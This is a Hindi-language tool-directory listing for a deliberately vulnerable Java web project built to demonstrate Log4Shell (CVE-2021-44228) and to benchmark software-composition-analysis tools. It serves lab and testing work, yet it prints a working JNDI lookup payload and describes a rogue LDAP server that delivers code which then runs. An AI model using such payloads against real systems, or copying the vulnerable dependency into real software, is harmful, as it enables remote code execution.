Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
l4j-tp1 — log4shell (CVE-2021-44228) भेद्यता वाला jee वेब प्रोजेक्ट | Kitploit
उपकरण/GitHubGitHub/scabench/l4j-tp1
भेद्यता विश्लेषणशोषणवेब सुरक्षाआपूर्ति श्रृंखला सुरक्षालर्निंग और शिक्षालैब और अभ्यास
GitHubscabench/l4j-tp1

l4j-tp1

log4shell (CVE-2021-44228) भेद्यता वाला jee वेब प्रोजेक्ट

रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

log4shell वास्तविक सकारात्मक

यह log4shell भेद्यता वाला एक साधारण वेब प्रोजेक्ट है। प्रोजेक्ट एक साधारण scabench.HelloWorldService get सेवा को परिभाषित करता है जो एक सादा टेक्स्ट स्ट्रिंग hello world लौटाती है। यह सेवा पैरामीटर की अपेक्षा नहीं करती है, और यदि पैरामीटर मिलते हैं, तो एक त्रुटि लॉग की जाती है।

भेद्य निर्भरता org.apache.logging.log4j:log4j-core:2.14.1 है, और भेद्यता CVE-2021-44228 है।

एक परीक्षण का उपयोग करके भेद्यता का प्रदर्शन

इसके लिए unix या macos की आवश्यकता होती है। इस प्रोजेक्ट को windows पर पोर्ट करना आसान है।

भेद्यता प्रदर्शित करने के लिए एक यूनिट टेस्ट प्रदान किया गया है। टेस्ट के लिए एक ldap सर्वर की आवश्यकता होती है जो भेद्य कोड प्रदान करता है, संबंधित निष्पादन योग्य प्रोजेक्ट द्वारा प्रदान किया जाता है, इसे एक अलग प्रोजेक्ट https://github.com/jensdietrich/Log4J-RCE-Proof-Of-Concept में परिभाषित किया गया है जो https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept पर आधारित है। टेस्ट फिक्स्चर ldap सर्वर के स्टार्टअप और शटडाउन को संभालेगा।

यह टेस्ट foo नामक एक फ़ाइल बनाएगा, जो उस ldap सर्वर के कोड में एम्बेडेड एन्कोडेड कमांड पर आधारित है जिससे log4j कनेक्ट होता है (touch foo)। इस सर्वर को एक हमलावर द्वारा नियंत्रित किया जा सकता है।

टेस्ट चलाने के लिए प्रोजेक्ट को mvn test से बनाएँ।

एप्लिकेशन चलाकर भेद्यता का प्रदर्शन

  1. एम्बेडेड वेब सर्वर शुरू करें: mvn jetty:run
  2. शामिल ldap सर्वर शुरू करें: java -jar dodgy-ldap-server.jar (भेद्य कोड इस सर्वर से Java कोड डाउनलोड करेगा)
  3. ब्राउज़र को http://localhost:8080/ पर इंगित करें, इस साइट में एक पूर्व-भरा हुआ फ़ॉर्म है जिसमें एक दुर्भावनापूर्ण पेलोड ${jndi:ldap://127.0.0.1/exe} है
  4. इस फ़ॉर्म को सबमिट करें
  5. इससे सर्वर पर foo नामक एक फ़ाइल बन जाएगी

सॉफ़्टवेयर कंपोज़िशन विश्लेषण चलाना

विभिन्न विश्लेषण चलाने के लिए कई sh स्क्रिप्ट हैं, परिणाम रिपोर्ट scan-results में पाई जा सकती हैं।

SBOM उत्पन्न करना

pom.xml में SBOM को CycloneDX प्रारूप में उत्पन्न करने के लिए एक प्लगइन है। ऐसा करने के लिए, mvn cyclonedx:makePackageBom चलाएँ, SBOM target/ में json और xml प्रारूप में पाया जा सकता है।

टूल डाउनलोड करें